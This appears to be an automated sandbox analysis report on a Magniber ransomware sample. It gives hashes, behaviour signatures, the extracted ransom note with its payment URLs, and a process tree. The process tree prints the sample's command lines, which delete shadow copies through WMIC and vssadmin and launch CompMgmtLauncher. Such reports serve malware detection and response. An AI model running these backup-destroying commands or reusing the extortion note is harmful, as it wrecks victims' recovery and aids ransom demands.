Overview

overview

10

Static

static

4.exe

windows7_x64

10

4.exe

windows10_x64

10

Analysis

  • max time kernel
    99s
  • max time network
    177s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    22-06-2021 14:06

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    4.exe

  • Size

    21KB

  • MD5

    191889cccd8827cb28b5cf9c3a559366

  • SHA1

    c1a6bc0e5d66524eaefa935e9d1dca0c9223bead

  • SHA256

    5301e5deb37674296e48d5873862ce32f934fbdfe1a7919f97bddb1138957e35

  • SHA512

    6d3af286eaa1c3051a739edeaa5f5684f31ff0575082bcd1c2155acfa82657b06b70d7aefc55be3dc1f0877cd4ca77b13f9e53720f5123339bf85eb36bfdfcdf

Score
10/10
magniberransomware

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\readme.txt

Family

magniber

Ransom Note
ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://2604a8602014c040e8uxkhdcf.ndkeblzjnpqgpo5o.onion/uxkhdcf Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://2604a8602014c040e8uxkhdcf.bejoin.space/uxkhdcf http://2604a8602014c040e8uxkhdcf.lieedge.casa/uxkhdcf http://2604a8602014c040e8uxkhdcf.wonride.site/uxkhdcf http://2604a8602014c040e8uxkhdcf.lognear.xyz/uxkhdcf Note! These are temporary addresses! They will be available for a limited amount of time!
URLs

http://2604a8602014c040e8uxkhdcf.ndkeblzjnpqgpo5o.onion/uxkhdcf

http://2604a8602014c040e8uxkhdcf.bejoin.space/uxkhdcf

http://2604a8602014c040e8uxkhdcf.lieedge.casa/uxkhdcf

http://2604a8602014c040e8uxkhdcf.wonride.site/uxkhdcf

http://2604a8602014c040e8uxkhdcf.lognear.xyz/uxkhdcf

Signatures

  • Magniber Ransomware

    Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.

    ransomwaremagniber
  • Process spawned unexpected child process 10 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Modifies extensions of user files 5 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Suspicious use of SetThreadContext 3 IoCs
  • Interacts with shadow copies 2 TTPs 5 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Modifies Internet Explorer settings 1 TTPs 34 IoCs
    adwarespyware
  • Modifies registry class 11 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
    ransomware
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 7 IoCs
  • Suspicious use of SendNotifyMessage 6 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1264
    • C:\Users\Admin\AppData\Local\Temp\4.exe
      "C:\Users\Admin\AppData\Local\Temp\4.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:1160
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1836
        • C:\Windows\system32\wbem\WMIC.exe
          C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
          4⤵
            PID:1632
        • C:\Windows\system32\cmd.exe
          cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1140
          • C:\Windows\system32\wbem\WMIC.exe
            C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:760
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1300
        • C:\Windows\system32\wbem\WMIC.exe
          C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1108
    • C:\Windows\system32\Dwm.exe
      "C:\Windows\system32\Dwm.exe"
      1⤵
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:1212
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1644
        • C:\Windows\system32\wbem\WMIC.exe
          C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1944
    • C:\Windows\system32\taskhost.exe
      "taskhost.exe"
      1⤵
      • Modifies extensions of user files
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:1128
      • C:\Windows\system32\notepad.exe
        notepad.exe C:\Users\Public\readme.txt
        2⤵
        • Opens file in notepad (likely ransom note)
        PID:2032
      • C:\Windows\system32\cmd.exe
        cmd /c "start http://2604a8602014c040e8uxkhdcf.bejoin.space/uxkhdcf^&1^&47753674^&86^&357^&12"
        2⤵
          PID:760
          • C:\Program Files\Internet Explorer\iexplore.exe
            "C:\Program Files\Internet Explorer\iexplore.exe" http://2604a8602014c040e8uxkhdcf.bejoin.space/uxkhdcf&1&47753674&86&357&12
            3⤵
            • Modifies Internet Explorer settings
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:340
            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:340 CREDAT:275457 /prefetch:2
              4⤵
              • Modifies Internet Explorer settings
              • Suspicious use of SetWindowsHookEx
              PID:1424
        • C:\Windows\system32\cmd.exe
          cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1180
          • C:\Windows\system32\wbem\WMIC.exe
            C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:432
      • C:\Windows\system32\cmd.exe
        cmd /c CompMgmtLauncher.exe
        1⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:2124
        • C:\Windows\system32\CompMgmtLauncher.exe
          CompMgmtLauncher.exe
          2⤵
            PID:2348
            • C:\Windows\system32\wbem\wmic.exe
              "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
              3⤵
                PID:2596
          • C:\Windows\system32\cmd.exe
            cmd /c CompMgmtLauncher.exe
            1⤵
            • Process spawned unexpected child process
            • Suspicious use of WriteProcessMemory
            PID:2140
            • C:\Windows\system32\CompMgmtLauncher.exe
              CompMgmtLauncher.exe
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:2224
              • C:\Windows\system32\wbem\wmic.exe
                "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                3⤵
                  PID:2504
            • C:\Windows\system32\cmd.exe
              cmd /c CompMgmtLauncher.exe
              1⤵
              • Process spawned unexpected child process
              • Suspicious use of WriteProcessMemory
              PID:2156
              • C:\Windows\system32\CompMgmtLauncher.exe
                CompMgmtLauncher.exe
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:2320
                • C:\Windows\system32\wbem\wmic.exe
                  "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                  3⤵
                    PID:2520
              • C:\Windows\system32\cmd.exe
                cmd /c CompMgmtLauncher.exe
                1⤵
                • Process spawned unexpected child process
                • Suspicious use of WriteProcessMemory
                PID:2164
                • C:\Windows\system32\CompMgmtLauncher.exe
                  CompMgmtLauncher.exe
                  2⤵
                    PID:2300
                    • C:\Windows\system32\wbem\wmic.exe
                      "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                      3⤵
                        PID:2572
                  • C:\Windows\system32\cmd.exe
                    cmd /c CompMgmtLauncher.exe
                    1⤵
                    • Process spawned unexpected child process
                    • Suspicious use of WriteProcessMemory
                    PID:2132
                    • C:\Windows\system32\CompMgmtLauncher.exe
                      CompMgmtLauncher.exe
                      2⤵
                        PID:2332
                        • C:\Windows\system32\wbem\wmic.exe
                          "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                          3⤵
                            PID:2684
                      • C:\Windows\system32\vssadmin.exe
                        vssadmin.exe Delete Shadows /all /quiet
                        1⤵
                        • Process spawned unexpected child process
                        • Interacts with shadow copies
                        PID:2708
                      • C:\Windows\system32\vssadmin.exe
                        vssadmin.exe Delete Shadows /all /quiet
                        1⤵
                        • Process spawned unexpected child process
                        • Interacts with shadow copies
                        PID:2816
                      • C:\Windows\system32\vssadmin.exe
                        vssadmin.exe Delete Shadows /all /quiet
                        1⤵
                        • Process spawned unexpected child process
                        • Interacts with shadow copies
                        PID:2848
                      • C:\Windows\system32\vssadmin.exe
                        vssadmin.exe Delete Shadows /all /quiet
                        1⤵
                        • Process spawned unexpected child process
                        • Interacts with shadow copies
                        PID:2868
                      • C:\Windows\system32\vssadmin.exe
                        vssadmin.exe Delete Shadows /all /quiet
                        1⤵
                        • Process spawned unexpected child process
                        • Interacts with shadow copies
                        PID:2944
                      • C:\Windows\system32\vssvc.exe
                        C:\Windows\system32\vssvc.exe
                        1⤵
                          PID:2968

                        Network

                        MITRE ATT&CK Enterprise v6

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\BJ15GQRU.txt
                          MD5

                          c55761fd616eb9878afe2804864d0a62

                          SHA1

                          1e97e927885a2998d28b693a251015c9c68d1501

                          SHA256

                          4d87515fe9d7bfbe5cf26ecef7626f62dbcdc6f862ebf9c78579a96a65fa1f3e

                          SHA512

                          f3488ffbe3bca8dfe4ed3eec9c1d5912d908f1205fff58e900d6bc9fc5940886d68fe8bd5fde4707861e25b22ffe438f76796f077e3130864198f1d4d7bf49e8

                          Download Submit

                        • C:\Users\Admin\Desktop\AssertTrace.wps.uxkhdcf
                          MD5

                          f6b8f5cd8336aee49f8eaa3554d4f90c

                          SHA1

                          02430c47a6e0f2cb113853cee45aced287ad7911

                          SHA256

                          7b8b88b435749b9e7c989a382a12876a45eb533066565a8d374f10b2b4fcbd0d

                          SHA512

                          db0efd2785bf92964fb774f79d70143426636e859177661eabf6b4110b8393d68927d8e0985a8f957dd5166d48b0aeb294eedd76ae9b537e5fb98bed7863a935

                          Download Submit

                        • C:\Users\Admin\Desktop\BackupSplit.asp.uxkhdcf
                          MD5

                          2cc955a92cc01333e05e621f3601837c

                          SHA1

                          cfa5a5579278a24b3ec2e64a85e3c2c0fd7bd002

                          SHA256

                          f0a2d01754df6e7b1afcc1629f33e88a3b84c7ae1809d1986df79d0f8e61bf7a

                          SHA512

                          57ed171a65d1ee358426d36e927cb01ee222d480ce89de6445ad9677db219786d7af6cb195c055112511983665a3705b41785f3606da00df6b6533ef2c7af0e6

                          Download Submit

                        • C:\Users\Admin\Desktop\CompleteRemove.pps.uxkhdcf
                          MD5

                          9b7f35c9a519dd70f050c812345c0f2d

                          SHA1

                          0d30302a95ef88c0f02110836cf46f051ed0b574

                          SHA256

                          ed047be41efd1dbcf6148965cd4d01cd14364d59141d13016d2b44ad9b7d777d

                          SHA512

                          cb5997ec057f8ddc38e981c482330473ef55e580684a586eacd12d81e2b6181d217d72cef344eb7e476d5e2a94d8e6b1748e224b3db43552d8b7c75e58ffca28

                          Download Submit

                        • C:\Users\Admin\Desktop\CompressStart.tiff.uxkhdcf
                          MD5

                          2449d6ab2892a2cfc0dbcd62f498f5d2

                          SHA1

                          203e69b9eeecee20e681a8dfd92db57e1c8e419b

                          SHA256

                          82b1cca2700603406dad2ce8d3a02d8dc343b07613cf15d46efcc9fdf4952643

                          SHA512

                          8fdcef598a74c01facfc6fc482f7cfd6006c0478bec5424eb9647e3975efc86531adf2b30286f42a631f38058c516fd51b34676a72377ff00a5d76537ba438fa

                          Download Submit

                        • C:\Users\Admin\Desktop\ConnectPush.docm.uxkhdcf
                          MD5

                          5236ff8b9bd9ffc7c9fa48d4e271bca9

                          SHA1

                          fae063cd7fdf31a9a76ade37868cf4cc870d16c7

                          SHA256

                          e0aef9b958a7391357a40dd8aa627624cf0727e7caabfea4394a4a3e8cd3679a

                          SHA512

                          9101ce989136abd9e4eab1e93ddfee170bdc4d8c2c47f22616f8b5cb55726e21622c56bbe839ec9593da9a8f19dff1753df62c00f56ac756a1c4de4dc075a577

                          Download Submit

                        • C:\Users\Admin\Desktop\ConvertFromSync.doc.uxkhdcf
                          MD5

                          2ae6a2827116ae4defd3459ddfe2056e

                          SHA1

                          ddd9297c86a4fa71f6f02e27d49ca50a8c83220c

                          SHA256

                          cdcd8297c47a78d504fb456c3a19baac455c6069de4af6d5387214e92e96bee7

                          SHA512

                          b42e044568d9f91a15d2c451472e5bc540baa44402030e610e12b65537562bb1597cd3613f33827ee4d688dfc6e4ebd012c5849d689a615ad886e916478b5233

                          Download Submit

                        • C:\Users\Admin\Desktop\DisconnectRead.svgz.uxkhdcf
                          MD5

                          f33c88f29bb9bc6099a6dcaf407e9a74

                          SHA1

                          f0426100fe36fa46d7b1d9cb1cd93501387061b9

                          SHA256

                          4ed65536bb58b30d8e8101b9fb8439042a42370c08ad83392585ac24b3f2b205

                          SHA512

                          1ea26e64a5fd473ed8eb2c18fc4ff384fb4c23b1c0b858b620665c1726d69124ac8176af3b1af13d6d9584a85015370408f1517c1004b2a4b810c98f2af89484

                          Download Submit

                        • C:\Users\Admin\Desktop\HideExpand.ods.uxkhdcf
                          MD5

                          0cdd2f265866df6bb85b78dade0d11fc

                          SHA1

                          6d9e933b5463b697cc68d8a99bbe60e99f550ea7

                          SHA256

                          68da25e964770f89696eeacb970a69208986f5023914163ed6429ba2bb1cc972

                          SHA512

                          e1beb07d3491e7267b6ca13da87f9ba6f70be53879d3a64f40f9ecc0617b216d914ee8ade2c1343564237a79410c4831036f356c8361e664147e4e5f220d52a1

                          Download Submit

                        • C:\Users\Admin\Desktop\ReadUpdate.ppsm.uxkhdcf
                          MD5

                          b6dc2286ce96901aa80b1c940464cc22

                          SHA1

                          7475cb5b06d36833e987f512c956f34883e99c8a

                          SHA256

                          f2d0c1be68680d3017af19b0cb08eb7374aefc1d61647602c154e841bbd182ef

                          SHA512

                          13fae73651f109249f72ba89f3e39160c77b6fee95ba5497a639192ce0820279774214e367d2d2af20eff200fad094ce1ddc304caa55b00507d85863ecc8d471

                          Download Submit

                        • C:\Users\Admin\Desktop\RedoHide.pps.uxkhdcf
                          MD5

                          7f03e58146276e78dbde2e574213ff6a

                          SHA1

                          0381f86e688fa376dc51170b0a92f3f88ba65b97

                          SHA256

                          d23f0359cf03c493e53d7dce3e05a27aa8083c4769a2f2eca5101cec50715115

                          SHA512

                          de96e7f197f3f0597074497eec85f2b7e3f0fc824641a79ffc3f543f23ccd1a929b9874d063c7d534e954435052f8e9c883fbf837f826827e08a645ff1d6fede

                          Download Submit

                        • C:\Users\Admin\Desktop\ResumeWait.asf.uxkhdcf
                          MD5

                          521cd8b11b5e5819400da65ecbc3ac07

                          SHA1

                          ccfe5e2117e7cebd9572118234e214ba1fab3f55

                          SHA256

                          ed3bc65c36d75a7f7aaf9bb1804091f2b64841941d29088ccafe78dea97a18c1

                          SHA512

                          4c2724e99c09592b9e21b1af8d2f1b46365b4a42830a9791005c822b0509709cb96fafcaa3eb5c351807e987fc1b92f04a7310d60102c5a73985bf2fdaf3139a

                          Download Submit

                        • C:\Users\Admin\Desktop\RevokeOptimize.pps.uxkhdcf
                          MD5

                          5c5eda65b9de1ded02b5590dfd5aa5ec

                          SHA1

                          927302692cb5893c7efad581e3a65ede83326081

                          SHA256

                          e179a4d30d4814cfe3ee8f998ee277d044ef0bbc8ee4f91f8fed86acfcbaa96f

                          SHA512

                          d35ff0d3a1859b6e50a64ee2131610650c4a5276c0b6144e3c5d8e41704e27de8ff7262e92bc8e806e929c87c0ff52ad7b6f61b5aa673c760944ff7e2cd0c100

                          Download Submit

                        • C:\Users\Admin\Desktop\SaveSet.bmp.uxkhdcf
                          MD5

                          872c817d0a08821800219a14bf98507d

                          SHA1

                          d5c44230212d40c1c2e9d199b641940faa4f81c9

                          SHA256

                          f37f3ffad75361f06d0c26f1831453222162b77b7b68dd6cce32c59fcdfd60bf

                          SHA512

                          b548aa0e99d8c62a38823ad8f1a1a9ca6189eff57f29cb3b61e266a91b3703643915783554b9df1b4390b92050d18c9d4bd895280e50758c8ef7ec415a39f8ee

                          Download Submit

                        • C:\Users\Admin\Desktop\UnpublishRevoke.wav.uxkhdcf
                          MD5

                          b121fd2a6c389f0e5d67bef8cb85e0fa

                          SHA1

                          a26fdd47a26bec3e19a1a7197b9423f1246fb28e

                          SHA256

                          c25d28202f027c7a93181661766b70b61034d16217c1069ace36a5918e606263

                          SHA512

                          ad432927785d79bfbecb22f4eefc9057fa4ad89fc6e2d590279cf9b9deb307249fca07a57ea6e1f897afb433bc7fe62cc8125651985ce5e3ed86d1b862056239

                          Download Submit

                        • C:\Users\Admin\Desktop\UpdateExpand.jfif.uxkhdcf
                          MD5

                          25fc2bee298976d777ca743107082978

                          SHA1

                          1d0af6a404607461615e1446531c7ff25934750f

                          SHA256

                          2f0a749b5f503211f409d52ab2cf49056669c7dbb6abf2e30b46ff698792551c

                          SHA512

                          a2695183da0cb6cf61a8d9f4466432b27288da7815b4a5211d99bad818205afb373940326f9014e68723fbe89898931a4d2791c98abd5bb24b80386da6a451f3

                          Download Submit

                        • C:\Users\Admin\Desktop\readme.txt
                          MD5

                          a1a487281dd2680a6d0374aeafb30d78

                          SHA1

                          ee96edafe08a88a9cafdc5fdc8af6bb2bf3c31a7

                          SHA256

                          80a8136c2cd5dc7947f890ba15600045bb64c97b1b3ffef5c1bb84cca618e7df

                          SHA512

                          83553e3b351f42d9aa051988b2a5e1ebea4bb180dbe74fa7f99e4f1aca3c594b0a7b9c69302b88c7615443b0a741092e1bb657995521ca88a52c90d463b896fa

                          Download Submit

                        • C:\Users\Public\readme.txt
                          MD5

                          a1a487281dd2680a6d0374aeafb30d78

                          SHA1

                          ee96edafe08a88a9cafdc5fdc8af6bb2bf3c31a7

                          SHA256

                          80a8136c2cd5dc7947f890ba15600045bb64c97b1b3ffef5c1bb84cca618e7df

                          SHA512

                          83553e3b351f42d9aa051988b2a5e1ebea4bb180dbe74fa7f99e4f1aca3c594b0a7b9c69302b88c7615443b0a741092e1bb657995521ca88a52c90d463b896fa

                          Download Submit

                        • memory/340-130-0x0000000000000000-mapping.dmp

                          Download

                        • memory/432-128-0x0000000000000000-mapping.dmp

                          Download

                        • memory/760-126-0x0000000000000000-mapping.dmp

                          Download

                        • memory/760-154-0x0000000000000000-mapping.dmp

                          Download

                        • memory/1108-150-0x0000000000000000-mapping.dmp

                          Download

                        • memory/1128-106-0x0000000001D60000-0x0000000001D64000-memory.dmp

                          Filesize

                          16KB

                          Download

                        • memory/1140-152-0x0000000000000000-mapping.dmp

                          Download

                        • memory/1160-96-0x0000000001D30000-0x0000000001D31000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/1160-90-0x00000000003A0000-0x00000000003A1000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/1160-59-0x0000000000020000-0x0000000000025000-memory.dmp

                          Filesize

                          20KB

                          Download

                        • memory/1160-64-0x00000000000F0000-0x00000000000F1000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/1160-63-0x00000000000E0000-0x00000000000E1000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/1160-65-0x0000000000100000-0x0000000000101000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/1160-66-0x0000000000110000-0x0000000000111000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/1160-89-0x0000000000390000-0x0000000000391000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/1160-95-0x0000000001D20000-0x0000000001D21000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/1160-94-0x0000000001D10000-0x0000000001D11000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/1160-91-0x00000000003B0000-0x00000000003B1000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/1160-93-0x0000000001D00000-0x0000000001D01000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/1180-127-0x0000000000000000-mapping.dmp

                          Download

                        • memory/1300-148-0x0000000000000000-mapping.dmp

                          Download

                        • memory/1424-155-0x0000000000000000-mapping.dmp

                          Download

                        • memory/1632-153-0x0000000000000000-mapping.dmp

                          Download

                        • memory/1644-131-0x0000000000000000-mapping.dmp

                          Download

                        • memory/1836-151-0x0000000000000000-mapping.dmp

                          Download

                        • memory/1944-149-0x0000000000000000-mapping.dmp

                          Download

                        • memory/2032-60-0x0000000000000000-mapping.dmp

                          Download

                        • memory/2032-61-0x000007FEFBC81000-0x000007FEFBC83000-memory.dmp

                          Filesize

                          8KB

                          Download

                        • memory/2224-156-0x0000000000000000-mapping.dmp

                          Download

                        • memory/2300-157-0x0000000000000000-mapping.dmp

                          Download

                        • memory/2320-158-0x0000000000000000-mapping.dmp

                          Download

                        • memory/2332-159-0x0000000000000000-mapping.dmp

                          Download

                        • memory/2348-160-0x0000000000000000-mapping.dmp

                          Download

                        • memory/2504-166-0x0000000000000000-mapping.dmp

                          Download

                        • memory/2520-167-0x0000000000000000-mapping.dmp

                          Download

                        • memory/2572-168-0x0000000000000000-mapping.dmp

                          Download

                        • memory/2596-169-0x0000000000000000-mapping.dmp

                          Download

                        • memory/2684-170-0x0000000000000000-mapping.dmp

                          Download